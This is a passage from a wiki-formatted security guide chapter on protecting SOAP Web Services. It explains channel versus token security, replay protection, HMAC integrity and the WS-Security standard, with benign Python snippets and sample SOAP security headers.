The good news for Web Services developers is that these are infrastructure-level tasks, so, theoretically, it is only the system administrators who should be worrying about these issues. However, for a number of reasons discussed later in this chapter, WS developers usually have to be at least aware of all these risks, and oftentimes they still have to resort to manually coding or tweaking the protection components.&lt;br /&gt;
&lt;br /&gt;
==Communication security ==&lt;br /&gt;
&lt;br /&gt;
There is a commonly cited statement, and an even more often implemented approach: “we are using SSL to protect all communication, so we are secure”. At the same time, there have been so many articles published on the topic of “channel security vs. token security” that it hardly makes sense to repeat those arguments here. Therefore, listed below is just a brief rundown of the most common pitfalls of using channel security alone:&lt;br /&gt;
&lt;br /&gt;
* It provides only “point-to-point” security&lt;br /&gt;
&lt;br /&gt;
Any communication with multiple “hops” requires establishing separate channels (and trusts) between each communicating node along the way. There is also a subtle issue of trust transitivity, as trusts between node pairs {A,B} and {B,C} do not automatically imply {A,C} trust relationship.&lt;br /&gt;
&lt;br /&gt;
* Storage issue&lt;br /&gt;
&lt;br /&gt;
After messages are received on a server (even if it is not the intended recipient), they exist in clear-text form, at least temporarily. Storing the transmitted information at the intermediate or destination servers – in log files (where it can be browsed by anybody) and local caches – aggravates the problem.&lt;br /&gt;
&lt;br /&gt;
* Lack of interoperability&lt;br /&gt;
&lt;br /&gt;
While SSL provides a standard mechanism for transport protection, applications then have to utilize highly proprietary mechanisms for transmitting credentials, ensuring freshness, integrity, and confidentiality of data sent over the secure channel. Using a different server, which is semantically equivalent, but accepts a different format of the same credentials, would require altering the client and prevent forming automatic B2B service chains. &lt;br /&gt;
&lt;br /&gt;
Standards-based token protection in many cases provides a superior alternative for message-oriented Web Service SOAP communication model.&lt;br /&gt;
&lt;br /&gt;
That said, the reality is that most Web Services today are still protected by some form of channel security mechanism, which alone might suffice for a simple internal application. However, one should clearly realize the limitations of such an approach, and make conscious trade-offs at design time as to whether channel, token, or combined protection would work better for each specific case.&lt;br /&gt;
&lt;br /&gt;
==Passing credentials ==&lt;br /&gt;
&lt;br /&gt;
In order to enable credentials exchange and authentication for Web Services, their developers must address the following issues.&lt;br /&gt;
&lt;br /&gt;
First, since SOAP messages are XML-based, all passed credentials have to be converted to text format. This is not a problem for username/password types of credentials, but binary ones (like X.509 certificates or Kerberos tokens) require converting them into text prior to sending and unambiguously restoring them upon receiving, which is usually done via a procedure called Base64 encoding and decoding.&lt;br /&gt;
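As a minimal sketch of this conversion step, Python's standard base64 module performs exactly this encoding and decoding (the token bytes below are illustrative, not a real certificate):

```python
import base64

# Illustrative stand-in for a binary credential such as a DER-encoded
# X.509 certificate or a Kerberos token.
binary_token = bytes(range(16))

# Encode to plain text so the credential can travel inside an XML message...
encoded = base64.b64encode(binary_token).decode("ascii")

# ...and restore it unambiguously on the receiving side.
decoded = base64.b64decode(encoded)
```

The round trip is lossless, which is what makes Base64 suitable for carrying binary tokens inside SOAP headers.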
&lt;br /&gt;
Second, passing credentials carries an inherent risk of their disclosure – either by sniffing them during transmission over the wire, or by analyzing the server logs. Therefore, things like passwords and private keys need to be either encrypted or simply never sent “in the clear”. The usual ways of avoiding sending sensitive credentials involve cryptographic hashing and/or signatures.&lt;br /&gt;
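As a concrete illustration of the hashing approach, the WSS UsernameToken profile defines a PasswordDigest along these lines: the Base64 of the SHA-1 hash of a nonce, a creation timestamp, and the password. A sketch in Python (the password value is, of course, hypothetical):

```python
import base64
import hashlib
import os
from datetime import datetime, timezone

# Hypothetical password shared between client and server.
password = b"s3cret"

# A fresh random nonce and a creation timestamp accompany every request.
nonce = os.urandom(16)
created = datetime.now(timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ").encode()

# PasswordDigest construction: Base64(SHA-1(nonce, created, password)).
digest = base64.b64encode(hashlib.sha1(nonce + created + password).digest())
```

The server, which knows the password, recomputes the digest from the transmitted nonce and timestamp; the password itself never crosses the wire, and the nonce and timestamp double as replay protection.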
&lt;br /&gt;
==Ensuring message freshness ==&lt;br /&gt;
&lt;br /&gt;
Even a valid message may present a danger if it is utilized in a “replay attack” – i.e. it is sent multiple times to the server to make it repeat the requested operation. This may be achieved by capturing an entire message, even if it is sufficiently protected against tampering, since it is the message itself that is used for attack now (see the XML Injection section of the Interpreter Injection chapter).&lt;br /&gt;
&lt;br /&gt;
The usual means of protecting against replayed messages is either using unique identifiers (nonces) on messages and keeping track of the ones already processed, or using a relatively short validity time window. In the Web Services world, information about the message creation time is usually communicated by inserting timestamps, which may just state the instant the message was created, or carry additional information, like its expiration time or certain conditions.&lt;br /&gt;
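A minimal sketch of a replay guard combining both ideas, assuming a hypothetical accept() helper and timestamps expressed as epoch seconds:

```python
import time

WINDOW = 300        # accept messages up to 5 minutes old
seen_nonces = {}    # nonce mapped to the moment the window itself rejects it

def accept(nonce, created, now=None):
    """Return True only for fresh, never-before-seen messages."""
    now = time.time() if now is None else now
    # Purge entries already rejected by the time window alone,
    # so the nonce cache does not grow without bound.
    for n in [n for n, exp in seen_nonces.items() if now >= exp]:
        del seen_nonces[n]
    if now - created > WINDOW:   # stale message
        return False
    if nonce in seen_nonces:     # replayed message
        return False
    seen_nonces[nonce] = created + WINDOW
    return True
```

Note how the time window bounds the nonce cache: a nonce only needs to be remembered until the timestamp check would reject the message anyway.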
&lt;br /&gt;
The latter solution, although easier to implement, requires clock synchronization and is sensitive to “server time skew”, where the server’s or clients’ clocks drift too much and prevent timely message delivery, although this usually does not present significant problems with modern-day computers. A greater issue lies with message queuing at the servers, where messages may expire while waiting to be processed in the queue of an especially busy or non-responsive server.&lt;br /&gt;
&lt;br /&gt;
==Protecting message integrity ==&lt;br /&gt;
&lt;br /&gt;
When a message is received by a web service, it must always ask two questions: “do I trust the caller?” and “did the caller create this message?” Assuming that caller trust has been established one way or another, the server has to be assured that the message it is looking at was indeed issued by the caller, and not altered along the way (intentionally or not). Such alteration may affect technical qualities of a SOAP message, such as the message’s timestamp, or its business content, such as the amount to be withdrawn from a bank account. Obviously, neither change should go undetected by the server.&lt;br /&gt;
&lt;br /&gt;
In communication protocols, there are usually mechanisms like checksums applied to ensure a packet’s integrity. This would not be sufficient, however, in the realm of publicly exposed Web Services, since checksums (or digests, their cryptographic equivalents) are easily replaceable and cannot be reliably traced back to the issuer. The required association may be established by utilizing an HMAC, or by combining message digests with either cryptographic signatures or secret-key encryption (assuming the keys are known only to the two communicating parties), so that any change will immediately result in a cryptographic error.&lt;br /&gt;
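A brief sketch of the HMAC variant using Python's standard library (the key and message values are illustrative):

```python
import hashlib
import hmac

# Secret known only to the two communicating parties (illustrative value).
key = b"shared-secret"
message = b"withdraw 100 from account 42"

# The sender attaches the keyed digest; unlike a plain checksum, an
# attacker who alters the message cannot recompute it without the key.
tag = hmac.new(key, message, hashlib.sha256).hexdigest()

def verify(key, message, tag):
    expected = hmac.new(key, message, hashlib.sha256).hexdigest()
    # Constant-time comparison avoids leaking information via timing.
    return hmac.compare_digest(expected, tag)
```

Any change to the message, the tag, or the key makes verification fail, which gives the receiver the tamper-evidence a bare digest cannot.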
&lt;br /&gt;
==Protecting message confidentiality ==&lt;br /&gt;
&lt;br /&gt;
Oftentimes, it is not sufficient to ensure integrity alone – in many cases it is also desirable that nobody can see the data that is passed around and/or stored locally. This may apply to the entire message being processed, or only to certain parts of it – in either case, some type of encryption is required to conceal the content. Normally, symmetric encryption algorithms are used to encrypt bulk data, since they are significantly faster than asymmetric ones. Asymmetric encryption is then applied to protect the symmetric session keys, which, in many implementations, are valid for one communication only and are subsequently discarded.&lt;br /&gt;
&lt;br /&gt;
Applying encryption requires extensive setup work, since the communicating parties now have to be aware of which keys they can trust, deal with certificate and key validation, and know which keys should be used for communication.&lt;br /&gt;
&lt;br /&gt;
In many cases, encryption is combined with signatures to provide both integrity and confidentiality. Normally, signing keys are different from the encrypting ones, primarily because of their different lifecycles – signing keys are permanently associated with their owners, while encryption keys may be invalidated after the message exchange. Another reason may be separation of business responsibilities - the signing authority (and the corresponding key) may belong to one department or person, while encryption keys are generated by the server controlled by members of IT department. &lt;br /&gt;
&lt;br /&gt;
==Access control ==&lt;br /&gt;
&lt;br /&gt;
After the message has been received and successfully validated, the server must decide:&lt;br /&gt;
&lt;br /&gt;
* Does it know who is requesting the operation (Identification)&lt;br /&gt;
&lt;br /&gt;
* Does it trust the caller’s identity claim (Authentication)&lt;br /&gt;
&lt;br /&gt;
* Does it allow the caller to perform this operation (Authorization)&lt;br /&gt;
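The three checks above can be sketched as follows; the user and permission stores here are hypothetical in-memory stand-ins for a real user directory and Policy Server:

```python
# Hypothetical stand-ins for a user directory and a policy store.
USERS = {"alice": "token-123"}             # identity data
PERMISSIONS = {"alice": {"getQuote"}}      # per-user allowed operations

def authorize(caller, token, operation):
    if caller not in USERS:                # Identification: is the caller known?
        return False
    if USERS[caller] != token:             # Authentication: is the claim trusted?
        return False
    # Authorization: may this caller perform this operation?
    return operation in PERMISSIONS.get(caller, set())
```

In a real deployment the token check would validate a signed credential rather than compare opaque strings, and the authorization decision would typically be delegated to a domain-wide Policy Server, but the three-stage decision remains the same.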
&lt;br /&gt;
There is not much WS-specific activity that takes place at this stage – just several new ways of passing the credentials for authentication. Most often, authorization (or entitlement) tasks occur completely outside of the Web Service implementation, at the Policy Server that protects the whole domain.&lt;br /&gt;
&lt;br /&gt;
There is another significant problem here – traditional HTTP firewalls do not help in stopping attacks against Web Services. An organization would need an XML/SOAP firewall, which is capable of conducting application-level analysis of the web server’s traffic and making intelligent decisions about passing SOAP messages on to their destination. The reader will need to refer to other books and publications on this very important topic, as it is impossible to cover it within just one chapter.&lt;br /&gt;
&lt;br /&gt;
==Audit ==&lt;br /&gt;
&lt;br /&gt;
A common task typically required by audits is reconstructing the chain of events that led to a certain problem. Normally, this is achieved by saving server logs in a secure location, available only to IT administrators and system auditors, in order to create what is commonly referred to as an “audit trail”. Web Services are no exception to this practice, and follow the general approach of other types of Web Applications.&lt;br /&gt;
&lt;br /&gt;
Another auditing goal is non-repudiation, meaning that a message can be verifiably traced back to the caller. Following the standard legal practice, electronic documents now require some form of an “electronic signature”, but its definition is extremely broad and can mean practically anything – in many cases, entering your name and birthday qualifies as an e-signature.&lt;br /&gt;
&lt;br /&gt;
As far as Web Services are concerned, such a level of protection would be insufficient and easily forgeable. The standard practice is to require cryptographic digital signatures over any content that has to be legally binding – if a document with such a signature is saved in the audit log, it can be reliably traced to the owner of the signing key. &lt;br /&gt;
&lt;br /&gt;
==Web Services Security Hierarchy ==&lt;br /&gt;
&lt;br /&gt;
Technically speaking, Web Services themselves are very simple and versatile – XML-based communication, described by an XML-based grammar called the Web Services Description Language (WSDL, see &amp;lt;u&amp;gt;http://www.w3.org/TR/2005/WD-wsdl20-20050510&amp;lt;/u&amp;gt;), which binds abstract service interfaces, consisting of messages (expressed as XML Schema) and operations, to the underlying wire format. Although it is by no means a requirement, the format of choice is currently SOAP over HTTP. This means that Web Service interfaces are described in terms of the incoming and outgoing SOAP messages, transmitted over the HTTP protocol.&lt;br /&gt;
&lt;br /&gt;
===Standards committees ===&lt;br /&gt;
&lt;br /&gt;
Before reviewing the individual standards, it is worth taking a brief look at the organizations which are developing and promoting them. There are quite a few industry-wide groups and consortiums working in this area, most important of which are listed below. &lt;br /&gt;
&lt;br /&gt;
W3C (see &amp;lt;u&amp;gt;http://www.w3.org&amp;lt;/u&amp;gt;) is the most well known industry group, which owns many Web-related standards and develops them in Working Group format. Of particular interest to this chapter are XML Schema, SOAP, XML-dsig, XML-enc, and WSDL standards (called recommendations in the W3C’s jargon).&lt;br /&gt;
&lt;br /&gt;
OASIS (see &amp;lt;u&amp;gt;http://www.oasis-open.org&amp;lt;/u&amp;gt;) mostly deals with Web Service-specific standards, not necessarily security-related. It also operates on a committee basis, forming so-called Technical Committees (TC) for the standards that it is going to be developing. Of interest for this discussion, OASIS owns WS-Security and SAML standards. &lt;br /&gt;
&lt;br /&gt;
The Web Services Interoperability Organization (WS-I, see &amp;lt;u&amp;gt;http://www.ws-i.org/&amp;lt;/u&amp;gt;) was formed to promote a general framework for interoperable Web Services. Its work mostly consists of taking other broadly accepted standards and developing so-called profiles – sets of requirements for conforming Web Service implementations. In particular, its Basic Security Profile (BSP) relies on the OASIS WS-Security standard and specifies the sets of optional and required security features in Web Services that claim interoperability.&lt;br /&gt;
&lt;br /&gt;
The Liberty Alliance (LA, see &amp;lt;u&amp;gt;http://projectliberty.org&amp;lt;/u&amp;gt;) consortium was formed to develop and promote an interoperable Identity Federation framework. Although this framework is general rather than strictly Web Service-specific, it is important for this topic because of its close relation to the SAML standard developed by OASIS. &lt;br /&gt;
&lt;br /&gt;
Besides the previously listed organizations, there are other industry associations, both permanently established and short-lived, which push forward various Web Service security activities. They are usually made up of the software industry’s leading companies, such as Microsoft, IBM, Verisign, BEA, Sun, and others, that join them to work on a particular issue or proposal. Results of these joint activities, once they reach a certain maturity, are often submitted to standards committees as a basis for new industry standards.&lt;br /&gt;
&lt;br /&gt;
==SOAP ==&lt;br /&gt;
&lt;br /&gt;
Simple Object Access Protocol (SOAP, see &amp;lt;u&amp;gt;http://www.w3.org/TR/2003/REC-soap12-part1-20030624/&amp;lt;/u&amp;gt;) provides an XML-based framework for exchanging structured and typed information between peer services. This information, formatted into Header and Body, can theoretically be transmitted over a number of transport protocols, but only HTTP binding has been formally defined and is in active use today. SOAP provides for Remote Procedure Call-style (RPC) interactions, similar to remote function calls, and Document-style communication, with message contents based exclusively on XML Schema definitions in the Web Service’s WSDL. Invocation results may be optionally returned in the response message, or a Fault may be raised, which is roughly equivalent to using exceptions in traditional programming languages.&lt;br /&gt;
&lt;br /&gt;
The SOAP protocol, while defining the communication framework, provides no help with securing message exchanges – the communications must either happen over secure channels or use the protection mechanisms described later in this chapter. &lt;br /&gt;
&lt;br /&gt;
===XML security specifications (XML-dsig &amp;amp; Encryption) ===&lt;br /&gt;
&lt;br /&gt;
XML Signature (XML-dsig, see &amp;lt;u&amp;gt;http://www.w3.org/TR/2002/REC-xmldsig-core-20020212/&amp;lt;/u&amp;gt;) and XML Encryption (XML-enc, see &amp;lt;u&amp;gt;http://www.w3.org/TR/2002/REC-xmlenc-core-20021210/&amp;lt;/u&amp;gt;) add cryptographic protection to plain XML documents. These specifications add integrity, message and signer authentication, as well as support for encryption/decryption of whole XML documents or of selected elements inside them. &lt;br /&gt;
&lt;br /&gt;
The real value of those standards comes from the highly flexible framework developed to reference the data being processed (both internal and external relative to the XML document), refer to the secret keys and key pairs, and to represent results of signing/encrypting operations as XML, which is added to/substituted in the original document.&lt;br /&gt;
&lt;br /&gt;
However, by themselves, XML-dsig and XML-enc do not solve the problem of securing SOAP-based Web Service interactions, since the client and service first have to agree on the order of those operations, where to look for the signature, how to retrieve cryptographic tokens, which message elements should be signed and encrypted, how long a message is considered to be valid, and so on. These issues are addressed by the higher-level specifications, reviewed in the following sections.&lt;br /&gt;
&lt;br /&gt;
===Security specifications ===&lt;br /&gt;
&lt;br /&gt;
In addition to the above standards, there is a broad set of security-related specifications currently being developed for various aspects of Web Service operations. &lt;br /&gt;
&lt;br /&gt;
One of them is SAML, which defines how identity, attribute, and authorization assertions should be exchanged among participating services in a secure and interoperable way. &lt;br /&gt;
&lt;br /&gt;
A broad consortium, headed by Microsoft and IBM, with input from Verisign, RSA Security, and other participants, developed a family of specifications collectively known as the “Web Services Roadmap”. Its foundation, WS-Security, was submitted to OASIS and became an OASIS standard in 2004. Other important specifications from this family are still in various stages of development, and plans for their submission have not yet been announced, although they cover such important issues as security policies (WS-Policy et al.), trust and security token exchange (WS-Trust), and establishing context for secure conversation (WS-SecureConversation). One specification in this family, WS-Federation, directly competes with the work being done by the LA consortium and, although it is supposed to be incorporated into the Longhorn release of Windows, its future is not clear at the moment, since it has been significantly delayed and presently does not have industry momentum behind it.&lt;br /&gt;
&lt;br /&gt;
==WS-Security Standard ==&lt;br /&gt;
&lt;br /&gt;
The WS-Security specification (WSS) was originally developed by Microsoft, IBM, and Verisign as part of a “Roadmap”, which was later renamed to Web Services Architecture, or WSA. WSS served as the foundation for all other specifications in this domain, creating a basic infrastructure for developing message-based security exchange. Because of its importance for establishing interoperable Web Services, it was submitted to OASIS and, after undergoing the required committee process, became an officially accepted standard. The current version is 1.0, and work on version 1.1 of the specification is under way, expected to finish in the second half of 2005.&lt;br /&gt;
[[category:FIXME | outdated info? is it complete now?]]&lt;br /&gt;
&lt;br /&gt;
===Organization of the standard ===&lt;br /&gt;
&lt;br /&gt;
The WSS standard itself deals with several core security areas, leaving many details to so-called profile documents. The core areas, broadly defined by the standard, are: &lt;br /&gt;
&lt;br /&gt;
* Ways to add security headers (WSSE Header) to SOAP Envelopes&lt;br /&gt;
&lt;br /&gt;
* Attachment of security tokens and credentials to the message &lt;br /&gt;
&lt;br /&gt;
* Inserting a timestamp&lt;br /&gt;
&lt;br /&gt;
* Signing the message&lt;br /&gt;
&lt;br /&gt;
* Encrypting the message	&lt;br /&gt;
&lt;br /&gt;
* Extensibility&lt;br /&gt;
&lt;br /&gt;
The flexibility of the WS-Security standard lies in its extensibility, so that it remains adaptable to new types of security tokens and protocols as they are developed. This flexibility is achieved by defining additional profiles for inserting new types of security tokens into the WSS framework. While the signing and encrypting parts of the standard are not expected to require significant changes (only when the underlying XML-dsig and XML-enc are updated), the types of tokens passed in WSS messages, and the ways of attaching them to the message, may vary substantially. At a high level, the WSS standard defines three types of security tokens attachable to a WSS Header: Username/password, Binary, and XML tokens. Each of those types is further specified in one (or more) profile documents, which define the additional token attributes and elements needed to represent a particular type of security token. &lt;br /&gt;
&lt;br /&gt;
[[Image:WSS_Specification_Hierarchy.gif|Figure 4: WSS specification hierarchy]]&lt;br /&gt;
&lt;br /&gt;
===Purpose ===&lt;br /&gt;
&lt;br /&gt;
The primary goal of the WSS standard is to provide tools for message-level communication protection, where each message represents an isolated piece of information, carrying enough security data to verify all important message properties, such as authenticity, integrity, and freshness, and to initiate decryption of any encrypted message parts. This concept stands in stark contrast to traditional channel security, which uniformly applies a pre-negotiated security context to the whole stream, as opposed to the selective process of securing individual messages in WSS. In the Roadmap, that type of service is eventually expected to be provided by implementations of standards like WS-SecureConversation.&lt;br /&gt;
&lt;br /&gt;
From the beginning, the WSS standard was conceived as a message-level toolkit for securely delivering data for higher level protocols. Those protocols, based on the standards like WS-Policy, WS-Trust, and Liberty Alliance, rely on the transmitted tokens to implement access control policies, token exchange, and other types of protection and integration. However, taken alone, the WSS standard does not mandate any specific security properties, and an ad-hoc application of its constructs can lead to subtle security vulnerabilities and hard to detect problems, as is also discussed in later sections of this chapter.&lt;br /&gt;
&lt;br /&gt;
==WS-Security Building Blocks ==&lt;br /&gt;
&lt;br /&gt;
The WSS standard actually consists of a number of documents. The core document defines how security headers may be included in a SOAP envelope and describes all the high-level blocks which must be present in a valid security header. Profile documents have the dual task of extending the definitions for the token types they deal with, providing additional attributes and elements, as well as defining relationships left out of the core specification, such as using attachments.&lt;br /&gt;
&lt;br /&gt;
The core WSS 1.1 specification, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16790/wss-v1.1-spec-os-SOAPMessageSecurity.pdf&amp;lt;/u&amp;gt;, defines several types of security tokens (discussed later in this section – see 0), ways to reference them, timestamps, and ways to apply XML-dsig and XML-enc in security headers – see the XML Dsig section for more details about their general structure.&lt;br /&gt;
&lt;br /&gt;
Associated specifications are:&lt;br /&gt;
&lt;br /&gt;
* Username token profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16782/wss-v1.1-spec-os-UsernameTokenProfile.pdf&amp;lt;/u&amp;gt;, which adds various password-related extensions to the basic UsernameToken from the core specification&lt;br /&gt;
&lt;br /&gt;
* X.509 token profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16785/wss-v1.1-spec-os-x509TokenProfile.pdf&amp;lt;/u&amp;gt;, which specifies how X.509 certificates may be passed in the BinarySecurityToken defined by the core document&lt;br /&gt;
&lt;br /&gt;
* SAML Token profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16768/wss-v1.1-spec-os-SAMLTokenProfile.pdf&amp;lt;/u&amp;gt; that specifies how XML-based SAML tokens can be inserted into WSS headers.&lt;br /&gt;
&lt;br /&gt;
*  Kerberos Token Profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16788/wss-v1.1-spec-os-KerberosTokenProfile.pdf&amp;lt;/u&amp;gt; that defines how to encode Kerberos tickets and attach them to SOAP messages.&lt;br /&gt;
&lt;br /&gt;
* Rights Expression Language (REL) Token Profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16687/oasis-wss-rel-token-profile-1.1.pdf&amp;lt;/u&amp;gt; that describes the use of ISO/IEC 21000-5 Rights Expressions with respect to the WS-Security specification.&lt;br /&gt;
&lt;br /&gt;
* SOAP with Attachments (SWA) Profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16672/wss-v1.1-spec-os-SwAProfile.pdf&amp;lt;/u&amp;gt; that describes how to use WSS-Sec with SOAP Messages with Attachments.&lt;br /&gt;
&lt;br /&gt;
===How data is passed ===&lt;br /&gt;
&lt;br /&gt;
The WSS security specification deals with two distinct types of data: security information, which includes security tokens, signatures, digests, etc.; and message data, i.e. everything else that is passed in the SOAP message. Being an XML-based standard, WSS works with textual information grouped into XML elements. Any binary data, such as cryptographic signatures or Kerberos tokens, has to go through a special transform, called Base64 encoding/decoding, which provides a straightforward conversion from binary to ASCII format and back. The example below demonstrates what binary data looks like in the encoded format:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
''cCBDQTAeFw0wNDA1MTIxNjIzMDRaFw0wNTA1MTIxNjIzMDRaMG8xCz''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
After encoding a binary element, an attribute with the algorithm’s identifier is added to the XML element carrying the data, so that the receiver knows which decoder to apply in order to read it. These identifiers are defined in the WSS specification documents.&lt;br /&gt;
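As a sketch of this transform, the following Python snippet (standard library only; the sample bytes are invented for illustration and are not a real certificate) round-trips binary token data through Base64: &lt;br /&gt;

```python
import base64

# Sample binary token data -- in practice this could be a DER-encoded
# X.509 certificate destined for a BinarySecurityToken element.
raw = b"\x30\x82\x02\xb7\x00\x01\x02\x03"

# Encode to ASCII so the bytes can be embedded as XML element text.
encoded = base64.b64encode(raw).decode("ascii")

# The receiver applies the decoder named by the EncodingType attribute
# (Base64Binary in the WSS profiles) to recover the original bytes.
decoded = base64.b64decode(encoded)
```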
&lt;br /&gt;
===Security header’s structure ===&lt;br /&gt;
&lt;br /&gt;
A security header in a message works rather like the envelope around a letter – it seals and protects the letter, but does not care about its content. This “indifference” works in the other direction as well: the letter (SOAP message) should not know, nor should it care, about its envelope (WSS Header), since the different units of information carried on the envelope and in the letter are presumably targeted at different people or applications.&lt;br /&gt;
&lt;br /&gt;
A SOAP Header may actually contain multiple security headers, as long as they are addressed to different actors (for SOAP 1.1) or roles (for SOAP 1.2). Their contents may also refer to each other, but such references present a very complicated logistical problem for determining the proper order of decryptions/signature verifications, and should generally be avoided. The WSS security header itself has a loose structure, as the specification does not require any elements to be present – so a minimalist header with an empty message will look like:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;soap:Envelope xmlns:soap=&amp;quot;http://schemas.xmlsoap.org/soap/envelope/&amp;quot;&amp;gt;&lt;br /&gt;
     &amp;lt;soap:Header&amp;gt;&lt;br /&gt;
         &amp;lt;wsse:Security xmlns:wsse=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd&amp;quot; xmlns:wsu=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd&amp;quot; soap:mustUnderstand=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
         &amp;lt;/wsse:Security&amp;gt;&lt;br /&gt;
    &amp;lt;/soap:Header&amp;gt;&lt;br /&gt;
     &amp;lt;soap:Body&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
     &amp;lt;/soap:Body&amp;gt;&lt;br /&gt;
 &amp;lt;/soap:Envelope&amp;gt;&lt;br /&gt;
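For illustration only, such an empty header could be constructed with Python’s standard xml.etree.ElementTree as sketched below; the namespace URIs are the ones shown in the sample above, while variable names are arbitrary: &lt;br /&gt;

```python
import xml.etree.ElementTree as ET

SOAP = "http://schemas.xmlsoap.org/soap/envelope/"
WSSE = ("http://docs.oasis-open.org/wss/2004/01/"
        "oasis-200401-wss-wssecurity-secext-1.0.xsd")

envelope = ET.Element(f"{{{SOAP}}}Envelope")
header = ET.SubElement(envelope, f"{{{SOAP}}}Header")
# mustUnderstand="1" obliges the receiver to process this header or fault.
ET.SubElement(header, f"{{{WSSE}}}Security",
              {f"{{{SOAP}}}mustUnderstand": "1"})
ET.SubElement(envelope, f"{{{SOAP}}}Body")

xml_bytes = ET.tostring(envelope)
```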
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
However, to be useful, the header must carry some information which is going to help secure the message. This means including one or more security tokens (see 0) with references, plus XML Signature and XML Encryption elements if the message is signed and/or encrypted. So, a typical header will look more like the following example: &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;soap:Envelope xmlns:soap=&amp;quot;http://schemas.xmlsoap.org/soap/envelope/&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;soap:Header&amp;gt;&lt;br /&gt;
     &amp;lt;wsse:Security xmlns=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd&amp;quot; xmlns:wsse=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd&amp;quot; xmlns:wsu=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd&amp;quot; soap:mustUnderstand=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
       &amp;lt;wsse:BinarySecurityToken EncodingType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary&amp;quot; ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509v3&amp;quot; wsu:Id=&amp;quot;aXhOJ5&amp;quot;&amp;gt;MIICtzCCAi... &lt;br /&gt;
       &amp;lt;/wsse:BinarySecurityToken&amp;gt;&lt;br /&gt;
       &amp;lt;xenc:EncryptedKey xmlns:xenc=&amp;quot;http://www.w3.org/2001/04/xmlenc#&amp;quot;&amp;gt;&lt;br /&gt;
         &amp;lt;xenc:EncryptionMethod Algorithm=&amp;quot;http://www.w3.org/2001/04/xmlenc#rsa-1_5&amp;quot;/&amp;gt;&lt;br /&gt;
 	&amp;lt;dsig:KeyInfo xmlns:dsig=&amp;quot;http://www.w3.org/2000/09/xmldsig#&amp;quot;&amp;gt;&lt;br /&gt;
 	  &amp;lt;wsse:SecurityTokenReference&amp;gt;&lt;br /&gt;
 	    &amp;lt;wsse:Reference URI=&amp;quot;#aXhOJ5&amp;quot; ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509v3&amp;quot;/&amp;gt;&lt;br /&gt;
 	  &amp;lt;/wsse:SecurityTokenReference&amp;gt;  &lt;br /&gt;
 	&amp;lt;/dsig:KeyInfo&amp;gt;&lt;br /&gt;
   	&amp;lt;xenc:CipherData&amp;gt;&lt;br /&gt;
   	  &amp;lt;xenc:CipherValue&amp;gt;Nb0Mf...&amp;lt;/xenc:CipherValue&amp;gt;&lt;br /&gt;
   	&amp;lt;/xenc:CipherData&amp;gt;&lt;br /&gt;
   	&amp;lt;xenc:ReferenceList&amp;gt;&lt;br /&gt;
   	  &amp;lt;xenc:DataReference URI=&amp;quot;#aDNa2iD&amp;quot;/&amp;gt;&lt;br /&gt;
   	&amp;lt;/xenc:ReferenceList&amp;gt;&lt;br /&gt;
       &amp;lt;/xenc:EncryptedKey&amp;gt;&lt;br /&gt;
       &amp;lt;wsse:SecurityTokenReference wsu:Id=&amp;quot;aZG0sG&amp;quot;&amp;gt;&lt;br /&gt;
 	&amp;lt;wsse:KeyIdentifier ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/XX/oasis-2004XX-wss-saml-token-profile-1.0#SAMLAssertionID&amp;quot; wsu:Id=&amp;quot;a2tv1Uz&amp;quot;&amp;gt; 1106844369755&amp;lt;/wsse:KeyIdentifier&amp;gt;&lt;br /&gt;
       &amp;lt;/wsse:SecurityTokenReference&amp;gt;&lt;br /&gt;
       &amp;lt;saml:Assertion AssertionID=&amp;quot;1106844369755&amp;quot; IssueInstant=&amp;quot;2005-01-27T16:46:09.755Z&amp;quot; Issuer=&amp;quot;www.my.com&amp;quot; MajorVersion=&amp;quot;1&amp;quot; MinorVersion=&amp;quot;1&amp;quot; xmlns:saml=&amp;quot;urn:oasis:names:tc:SAML:1.0:assertion&amp;quot;&amp;gt;&lt;br /&gt;
 		...				&lt;br /&gt;
       &amp;lt;/saml:Assertion&amp;gt;&lt;br /&gt;
       &amp;lt;wsu:Timestamp wsu:Id=&amp;quot;afc6fbe-a7d8-fbf3-9ac4-f884f435a9c1&amp;quot;&amp;gt;&lt;br /&gt;
 	&amp;lt;wsu:Created&amp;gt;2005-01-27T16:46:10Z&amp;lt;/wsu:Created&amp;gt;&lt;br /&gt;
 	&amp;lt;wsu:Expires&amp;gt;2005-01-27T18:46:10Z&amp;lt;/wsu:Expires&amp;gt;&lt;br /&gt;
      &amp;lt;/wsu:Timestamp&amp;gt;&lt;br /&gt;
